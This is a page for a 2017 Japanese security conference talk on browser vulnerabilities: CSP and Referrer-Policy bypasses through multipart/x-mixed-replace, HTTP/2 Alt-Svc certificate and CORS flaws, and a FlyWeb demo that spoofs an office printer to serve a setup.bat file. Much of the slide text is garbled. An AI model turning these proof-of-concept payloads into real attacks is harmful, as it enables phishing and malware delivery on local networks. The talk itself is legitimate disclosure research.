脆弱性発見者が注目する近年のWeb技術

9b5fecf0cfbd6572bd753a795b7e4b07?s=47 MUNEAKI NISHIMURA
February 03, 2017
Technology
29
11k

 脆弱性発見者が注目する近年のWeb技術

RECRUIT Technologies NIGHT vol.3の発表資料です。

9b5fecf0cfbd6572bd753a795b7e4b07?s=128

MUNEAKI NISHIMURA

February 03, 2017
Tweet

More Decks by MUNEAKI NISHIMURA

See All by MUNEAKI NISHIMURA
9b5fecf0cfbd6572bd753a795b7e4b07?s=48 nishimunea
26
8.4k
9b5fecf0cfbd6572bd753a795b7e4b07?s=48 nishimunea
15
2.4k
9b5fecf0cfbd6572bd753a795b7e4b07?s=48 nishimunea
1
600
9b5fecf0cfbd6572bd753a795b7e4b07?s=48 nishimunea
2
6.2k
9b5fecf0cfbd6572bd753a795b7e4b07?s=48 nishimunea
1
700
9b5fecf0cfbd6572bd753a795b7e4b07?s=48 nishimunea
6
3.9k

Other Decks in Technology

See All in Technology
Ee6254efe6c4bc4c08967c11d4939245?s=48 kotetuco
2
170
8a84268593355816432ceaf78777d585?s=48 dena_tech
1
2.2k
7e6a435700dda6cdb22105d601f20892?s=48 picardparis
4
2k
E9ce07196f470caff07053e98a88fa9e?s=48 10shi10ma
2
900
C58d9fc209cfdc0b822f851911110fa6?s=48 coe
14
6.2k
9a22d09f92d50fa3d2a16766d0ba52f8?s=48 fabpot
5
2.1k
Dd7fa413be25d8672c03a487db6a8fe6?s=48 fujiihda
3
650
F301c0275838d562c72ea9177e7ddc68?s=48 fkino
8
1.4k
3744945b353aca873f215d885310cc4c?s=48 meiradania
0
150
43a37af3a99834cd9c4b15806b5b4081?s=48 yoshiokacb
0
330
9df0566fad9c9ca3bf669917848878fe?s=48 i35_267
6
1.4k
26173c2f52b5aa5d06e6806c7a9478d3?s=48 laprasdrum
0
990

Featured

See All Featured
B6a8f005f39d23ffc930508ac9da68b9?s=48 vanstee
115
4.7k
812e1705ff0f8bc1bcf18587bde687d5?s=48 62gerente
582
200k
016edace78ffe826f2348d1e0c504afd?s=48 maggiecrowley
5
260
1b75d89772b7eea1f6c89fbf362607d9?s=48 moore
124
21k
170b760e0147792d0140e59ec78e9893?s=48 eitanlees
106
9.5k
D67fff74178013024d833b3eec6cf27f?s=48 lynnandtonic
266
16k
C35e01544a0dd94a2cf1619ee8a42ebb?s=48 clairelew
10
1.2k
A9704266587836f7e784235e5073b93e?s=48 jmmastey
2
250
E837d2996f52008ace055a08fbfff992?s=48 frogandcode
121
20k
7cbd3f5f922d798cc312eaf596de7ae6?s=48 iamctodd
10
1.4k
E4f5d494ebdc9e7cce1aecf3ce3e8bc1?s=48 shpigford
366
42k
9952dfcd5d338f8a8e7175c8a8f65fb5?s=48 wjessup
334
15k

Transcript

  1. ੬ऑੑൃݟऀ͕஫໨͢Δۙ೥ͷ8FCٕज़ 3&$36*55FDIOPMPHJFT/*()5WPM ೥݄೔

  2. ੢ଜ फߊ גࣜձࣾϦΫϧʔτςΫϊϩδʔζ αΠόʔηΩϡϦςΟΤϯδχΞϦϯά෦ γχΞηΩϡϦςΟΤϯδχΞ ࠃ಺ܞଳి࿩ϝʔΧʔͰͷηΩϡϦςΟίϯαϧλϯτ ͳͲΛܦͯ೥݄ΑΓݱ৬ɻϦΫϧʔτͷ*%؅ཧج ൫ͷηΩϡϦςΟอक΍ϦΫϧʔτάϧʔϓશࣾͷ੬ऑ ੑमਖ਼ࢧԉʹܞΘΔɻझຯ͸ϒϥ΢βͷ੬ऑੑΛ୳͢͜ ͱɻ೥ʹใࠂͨ͠੬ऑੑ͸݅Λ௒͑Δɻஶॻʹ

    ϒϥ΢βϋοΫʢ؂༁ʣɻओͳߨԋྺʹ$0%& #-6& ɺ"750,:0 ɺ1BD4FD ɻ೥ΑΓ ηΩϡϦςΟɾΩϟϯϓશࠃେձߨࢣ

  3. ੬ऑੑΛൃݟ͢Δਓͷࢹ఺Ͱ ஫໨͍ͯ͠Δ8FCٕज़Λ঺հ͠·͢

  4. Server Push

  5. • ௕೥ʹ౉Γٞ࿦ͱվળ͕ଓ͚ΒΕ͍ͯΔ8FCٕज़ • աڈʹ͸4FSWFS4FOU&WFOUT΍8FC4PDLFU • *&5'Ͱ͸)551QVTIΛޮՌతʹѻ͏ٕज़ͱͯ͠ &BSMZ)JOUT͕ఏҊ͞Ε͍ͯΔ • ଞʹ΋ɺϒϥ΢βͰ1VTI௨஌Λड͚औΔٕज़ͷඪ४Խ͕ਐΜͰ͓Γɺ 8FC1VTIϓϩτίϧ΍1VTI"1*ͷ࢓༷ࡦఆ͕ߦͳΘΕ͍ͯΔ

    • ͦΜͳதɺݸਓతʹ஫໨͍ͯ͠Δͷ͸ʜ 4FSWFS1VTI

  6. multipart / x-mixed-replace

  7. http://web.archive.org/web/19961020045320/http://www3.netscape.com/assist/net_sites/pushpull.html

  8. • ೥ɺ/FUTDBQFʹ౥ࡌ͞Εͨ࠷ݹͷ4FSWFS1VTI • .+1&(PWFS)551ͷ഑৴खஈͱͯ͠΋࢖༻͞Ε͍ͯΔ • .P[JMMBͷ5FMFNFUSZʹΑΔͱɺݱࡏͷར༻཰͸ • ݱࡏͰ͸ɺ'JSFGPY͘Β͍͔͠·ͱ΋ʹαϙʔτ͍ͯ͠ͳ͍ • ҰମͲ͜Ͱ࢖ΘΕ͍ͯΔͷ͔

    NVMUJQBSUYNJYFESFQMBDF

  9. #VH[JMMBͷݕࡧը໘ https://bugzilla.mozilla.org/buglist.cgi?quicksearch=nishimunea

  10. 3*$0)5)&5" https://developers.theta360.com/ja/docs/v2.1/api_reference/commands/camera.get_live_preview.html

  11. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html <h1>Page 1</h1> --BOUNDARY

    Content-type: text/html <h1>Page 2</h1> --BOUNDARY- ϖʔδ໨ͷσʔλ ϖʔδ໨ͷσʔλ

  12. Կނ஫໨͍ͯ͠Δ͔ͱ͍͏ͱ

  13. ηΩϡϦςΟϔομΛΑ͘ແࢹ͢Δ

  14. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Content-Security-Policy: default-src 'self' --BOUNDARY Content-type: text/html

    <script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- $41ͰΠϯϥΠϯεΫϦϓτͷ࣮ߦΛېࢭ

  15. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Content-Security-Policy: default-src 'self' --BOUNDARY Content-type: text/html

    <script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY-

  16. https://www.mozilla.org/en-US/security/advisories/mfsa2016-45/

  17. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html Content-Security-Policy: default-src 'self'

    <script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- $41ϔομͷҐஔΛԼʹͣΒͯ͠ΈΔ

  18. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html Content-Security-Policy: default-src 'self'

    <script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY-

  19. ·ͩ௚ͬͯͳ͍ https://bugzilla.mozilla.org/show_bug.cgi?id=1296471

  20. https://bugzilla.mozilla.org/show_bug.cgi?id=1296471 ੬ऑੑΛӅ͢͜ͱΑΓɺ$41ͷ࣮૷͕ෆ׬શͰ͋Δ͜ͱΛ 8FCαΠτͷ։ൃऀ͕஌Δ͜ͱͷํ͕େ੾ͩͱ൑அ͠ɺ .P[JMMB͸ະमਖ਼ͷ੬ऑੑ৘ใΛ։ࣔ

  21. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Referrer-Policy: no-referrer --BOUNDARY Content-type: text/html <a

    href="https://evil.example.jp">Link</a> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- 3FGFSSFS1PMJDZϔομͰϦϑΝϥૹग़Λېࢭ ͳͷʹϦϑΝϥ͕ૹΒΕΔ

  22. https://www.mozilla.org/en-US/security/advisories/mfsa2017-01/#CVE-2017-5385 'JSFGPYͰઌिमਖ਼͞Εͨ

  23. ৽͍͠ϔομ͕ొ৔͢Δͨͼָ͠ΊΔ

  24. HTTP/2

  25. • ೔࿨ݟ҉߸Λѱ༻ͯ͠ɺِͷ)5514αʔόʹ઀ଓͤ͞Δ͜ͱͷ Ͱ͖Δ੬ऑੑʢ$7&ʣΛ-5Ͱ঺հͨ͠ +YDL͞Μͱͷग़ձ͍͸ɺIUUQษڧձͰͨ͠ https://http2study.connpass.com/event/13251/

  26. ͦͷ੬ऑੑͷ࠶ݱө૾ΛݟͯΈ·͠ΐ͏

  27. ੬ऑੑͷݪҼ͸5-4ηογϣϯͷ࠶ར༻Ͱͨ͠ twitter.com (Fake) evil.csrf.jp https://twitter.com Reuse TLS Session Ticket (Session

    Resumption) Fake Application Data http://evil.csrf.jp alt-svc: h2="twitter.com:8021" TLS Session Ticket http://evil.csrf.jp Establish TLS Session without server certificate verification

  28. ੬ऑੑͷݪҼ͸5-4ηογϣϯͷ࠶ར༻Ͱͨ͠ twitter.com (Fake) evil.csrf.jp https://twitter.com Reuse TLS Session Ticket (Session

    Resumption) Fake Application Data http://evil.csrf.jp alt-svc: h2="twitter.com:8021" TLS Session Ticket http://evil.csrf.jp Establish TLS Session without server certificate verification ೔࿨ݟ҉߸Ͱαʔόূ໌ॻΛݕূͤͣʹ ཱ֬ͨ͠5-4ηογϣϯΛʜ )5514௨৴࣌ʹ࠶ར༻͍ͯͨ͠

  29. • )551$POOFDUJPO3FVTF 3'$ - ಉ͡*1ΞυϨεɺ͔ͭಉ͡ূ໌ॻͷ$/4"/ʹؚ·ΕΔϗετͱͷ௨৴Ͱ͋Ε͹ɺ )551ίωΫγϣϯΛڞ༗ͯ͠Α͍ • )551"MUFSOBUJWF4FSWJDFT 3'$ -

    ಉ͡ϦιʔεΛఏڙ͢Δ୅ସαʔόͷ࢖༻ΛΫϥΠΞϯτʹఏҊ͢Δ - ྫʣBMUFYBNQMFKQͷ൪ϙʔτͰ)551ʹΑΔ௨৴ΛΦϑΝʔ )551ͷίωΫγϣϯ؅ཧ͸ͳ͔ͳ͔େม alt-svc: h2="alt.example.jp:8000";

  30. flickr.com ෳ਺υϝΠϯͷ)551ίωΫγϣϯΛڞ༗͢Δͱ͖ flickr.com yahoo.com yahoo.com Certificate (valid for yahoo.com &

    flickr.com) Establish TLS Session ZBIPPDPNͱͷ௨৴Ͱཱ֬͞ΕͨίωΫγϣϯΛ GMJDLSDPNͱͷ௨৴ʹར༻Ͱ͖Δ Connection

  31. flickr.com αʔόূ໌ॻͷϐϯχϯάݕূ͕Α͘࿙ΕΔ flickr.com yahoo.com yahoo.com Certificate (valid for yahoo.com &

    flickr.com) Establish TLS Session Connection ͜͜ͰɺGMJDLSDPNͷެ։伴ϐϯχϯάΛݕূ͠๨Εͯ͠·͏ $7&ʢ'JSFGPYʣ$7&ʢ$ISPNFʣ

  32. flickr.com ͦΕͬͯ੬ऑੑʁ flickr.com yahoo.com Certificate (valid for yahoo.com & flickr.com)

    Connection yahoo.com Establish TLS Session ྆ํͷαΠτͷݖརऀ͸ҰॹͳͷͰ GMJDLSDPNͷϐϯχϯάΛݕূ͠ͳͯ͘΋ ࣮࣭తͳڴҖ͸͋·Γͳ͍ͷͰ͸ʁ

  33. ಉ͡ূ໌ॻ͔ͩΒαΠτͷݖརऀ͕ಉ͡ͱ͸ݶΒͳ͍ • ྫ͑͹ɺ'BTUMZͷڞ༗ূ໌ॻαʔϏε - IUUQTKBGPVSTRVBSFDPN ͷূ໌ॻΛݟͯΈΑ͏

  34. ͜ΕΒͷαΠτͷϐϯχϯάΛᷖճͰ͖Δͱ͍͏͜ͱ

  35. )551"MUFSOBUJWF4FSWJDF "MU4WD a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc:

    h2="b.example.jp:443" Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate

  36. "MU4WDͷਖ਼͍࣮͠૷͸͜͏ͳΜͰ͕͢ʜ a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc: h2="b.example.jp:443"

    Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate BFYBNQMFDPNͷূ໌ॻΛ4/*Ͱཁٻ BFYBNQMFDPNͷূ໌ॻͰ͋Δ͜ͱΛݕূ

  37. ࣮૷ΛޡΔͱ%/4ϦόΠϯσΟϯά੬ऑੑʹͳΔ a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc: h2="b.example.jp:443"

    Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate CFYBNQMFKQͷূ໌ॻΛ4/*Ͱཁٻ CFYBNQMFKQͷূ໌ॻͰ͋Δ͜ͱΛݕূ BFYBNQMFDPNͷ)551σʔλΛ ଞਓͷαʔόʹૹΓ෇͚Δ͜ͱ͕Ͱ͖Δ

  38. ͜ͷ࣮૷ϛε͕ݪҼͰ$034ΛᷖճͰ͖ͨྫ΋ evil XMLHttpRequest with DELETE method alt-svc: h2="victim:443" victim Preflight

    (OPTIONS method) DELETE request 1SFGMJHIUΛ߈ܸऀͷαΠτͰड͚ͯʜ ࣮ϦΫΤετ͚ͩΛඪతʹૹΔ

  39. https://bugzilla.mozilla.org/show_bug.cgi?id=1148357 ࢲ͸ڻ͍͍ͯΔɻ͜Ε͸"MU4WDΛ༻͍ͨॳͷ੬ऑੑͩ

  40. ಉ͡Α͏ͳ੬ऑੑ͕͖ͬͱࠓޙ΋ग़͖ͯͦ͏

  41. FlyWeb

  42. https://flyweb.github.io/#showcase

  43. • .P[JMMB͕࣮ࢪ͍ͯ͠Δɺ8FCͱ෺ཧσόΠεͷ࿈ܞϓϩδΣΫτ - 8FCίϯςϯπͱɺͦΕΛӾཡͨ͠ਓͷۙ͘ʹ͋Δ༷ʑͳσόΠε͕࿈ಈ • ϓϩδΣΫτ͸·࣮ͩݧஈ֊ - 'JSFGPY/JHIUMZʹͷΈσϑΥϧτແޮͰ౥ࡌ - BCPVUDPOGJH

    Ͱ EPNGMZXFCFOBCMFEUSVFʹઃఆ͢Δ͜ͱͰར༻Մೳ 'MZ8FC

  44. • ෳ਺ͷεϚϗΛ઀ଓ͠ɺϒϥ΢β্ͰରઓܕϨʔεήʔϜΛ࣮ݱ 'MZ8FCͷར༻ྫʢ'MZ8FC(1ʣ https://www.youtube.com/watch?v=FJ5DEGvqDb4

  45. 'MZ8FCͷ࢓૊Έ Local Network (1) Launch a website (2) HTML /

    JS (3) Publish mDNS and web servers (4) DNS Service Discovery (5) HTTP & WebSocket +BWB4DSJQUͰαʔόΛ্ཱͪ͛Δ ϩʔΧϧΤϦΞ಺ͷ୺຤͕ͦͷαʔόʹΞΫηε

  46. navigator.publishServer('MyServer').then(server => { server.onfetch = e => { var headers

    = {'Content-Type': 'text/html'}; var body = '<h1>Hello FlyWeb</h1>'; e.respondWith(new Response(body, {headers: headers})); }; });

  47. navigator.publishServer('MyServer').then(server => { server.onfetch = e => { var headers

    = {'Content-Type': 'text/html'}; var body = '<h1>Hello FlyWeb</h1>'; e.respondWith(new Response(body, {headers: headers})); }; }); .Z4FSWFS@GMZXFC@UDQMPDBMͱ͍͏αʔϏε໊Ͱ N%/4ͱ)551αʔόΛىಈ ϩʔΧϧΤϦΞͷ୺຤͕αʔόʹΞΫηε͖ͯͨ͠Β )FMMP'MZ8FCͱॻ͔Εͨ)5.-Λฦ͢

  48. αʔόͷىಈ֬ೝμΠΞϩά͕ग़ͯ ϖʔδΛݟͨϢʔβ͕ʮ"MMPX4FSWFSʯΛબ୒͢Δͱ ϩʔΧϧΤϦΞͰN%/4ͱ)551αʔό͕ىಈ͢Δ

  49. ϩʔΧϧΤϦΞʹ͋Δผͷ୺຤͕αʔόʹͭͳ͕Δ • 'JSFGPY͕ϩʔΧϧΤϦΞʹ͋Δ'MZ8FCαʔόΛࣗಈతʹ୳ࡧ͠ɺ ΞΫηεͰ͖ΔΑ͏ʹͯ͘͠ΕΔ

  50. #POKPVSରԠΦϑΟεϓϦϯλͷ؅ཧը໘΋։͚Δ • 'JSFGPYͷ'MZ8FC΢Οϯυ΢͸@IUUQUDQʹ΋ରԠ͍ͯ͠ΔͷͰ #POKPVSͰ)551ͷ6*Λఏڙ͢Δػثʹ΋ΞΫηεͰ͖Δ

  51. 'MZ8FCͰձࣾͷωοτϫʔΫʹ৵ೖͰ͖ͦ͏ͩ Local Network (1) Launch a website (2) HTML /

    JS (3) Publish mDNS and web servers (4) Launch HTTP UI (5) Download malware 'MZ8FCͰΦϑΟεϓϦϯλͷ ؅ཧը໘ʹͳΓ͢·͢ ؅ཧը໘ʹΞΫηεͨ͠୺຤ʹ Ϛϧ΢ΣΞ഑෍ ͏͔ͬΓࣾһ͕᠘αΠτΛӾཡ

  52. navigator.publishServer('Can0n ME220').then(server => { server.onfetch = e => { var

    h = {'Content-Type': 'application/bat', 'Content-Disposition': 'attachment; filename=setup.bat'}; var cmd = 'calc'; e.respondWith(new Response(cmd, {headers: h})); }; }); ΦϑΟεϓϦϯλͱಉ͡%/4໊Λࢦఆ ΞΫηεͨ͠୺຤ʹ TFUVQCBU Λ഑෍

  53. ͕͢͞ʹυϝΠϯ͕ո͍͠ͷͰܯռ͞Εͦ͏͚ͩͲʜ

  54. (PPHMF຋༁ܦ༝Ͱ։͚͹ͦΕͬΆ͍υϝΠϯʹ

  55. ଞͷࣾһِ͕ͷΦϑΟεϓϦϯλʹΞΫηε͢Δͱʜ ϓϦϯλυϥΠό͔ͳ͊ʜʁ

  56. None

  57. ͜ͷ··ͷ࢓༷ͩͱຊ౰ʹѱ༻͞Εͦ͏

  58. • 4FSWFS1VTI NVMUJQBSUYNJYFESFQMBDF • )551 • 'MZ8FC ஫໨͍ͯ͠Δ8FCٕज़Λͭ঺հ͠·ͨ͠